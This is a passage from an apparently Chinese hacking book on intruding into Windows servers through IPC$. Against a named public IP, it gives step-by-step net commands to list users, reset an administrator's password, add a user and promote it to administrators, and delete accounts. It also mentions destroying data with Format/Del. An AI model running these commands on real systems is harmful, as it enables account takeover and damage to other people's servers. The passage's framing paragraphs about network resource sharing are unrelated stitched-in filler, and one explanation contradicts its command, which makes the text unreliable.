黑客攻防技术内幕-防范入侵的办法(3)

网络技术是从1990年代中期发展起来的新技术，它把互联网上分散的资源融为有机整体，实现资源的全面共享和有机协作，使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享，网络则被认为是互联网发展的第三阶段。

6.1 IPC$漏洞入侵(3)

    

6.1.3  基于IPC$高级入侵

6.1.2小节讲述了通过NCX99建立远程登录，接下来将看看入侵者利用远程登录能做些什么？

注意：

本节前提是已远程登录到服务器。

入侵测试：

测试主机：61.150.115.9

(1) 查看目标机所有用户列表，在远程的命令提示符下运行如下命令格式：

net user

输入完毕后按Enter键，系统便会列出用户列表，如图6-22所示。

图6-22  列出目标机的用户列表

(2) 查看某个用户信息，在远程的命令提示符下运行如下命令格式：

net user system32

命令解释：

查看用户名为system32的用户属性。

输入完毕后按Enter键，接着系统会列出该用户的一些信息，如图6-23所示。

图6-23  列出用户system32的信息

从本地组会员中可以看出该用户隶属于Administrators组，也就是超级用户，对计算机有完全操作的权力。

(3) 入侵者还可以更改用户密码，在命令提示符下输入如下格式：

net user system32 hacker1219

命令解释：

将用户名system32的密码更改为：hacker1219。

输入完毕后按Enter键，接着会显示命令成功完成，如图6-24所示。

图6-24  更改用户密码

(4) 在目标机上添加用户可以在命令提示符下输入如下格式：

net user admin system /add

命令解释：

添加一个用户名为system的用户，并设密码为system。

输入完毕后按Enter键，接着会显示命令成功完成，如图6-25所示。

图6-25  向目标服务器添加用户

刚添加的用户Admin隶属于Users组，使用如下命令查看：

net user admin

输入完毕后按Enter键，如图6-26所示。

图6-26  查看用户Admin的属性

(5) 在远程登录目标机后提升用户权限时可在命令提示符下输入如下格式：

net localgroup administrators admin /add

命令解释：

将用户Admin添加到Administrators组里。

输入完毕后按Enter键，接着会显示命令成功完成，如图6-27所示。

图6-27  提升用户权限

(6) 如果需要在远程登录目标机后删除用户可在命令提示符下输入如下格式命令：

net user admin /delete

命令解释：

删除用户Admin。

输入完毕后按Enter键，接着会显示命令成功完成，如图6-28所示。

图6-28  删除用户

入侵者甚至可以使用Format、Del等命令，对目标服务器进行破坏，也会启动和停止服务器的某些服务，从而使系统面临着巨大的危险。

网络的神奇作用吸引着越来越多的用户加入其中，正因如此，网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......，各项技术都需要适时应势，对应发展，这正是网络迅速走向进步的催化剂。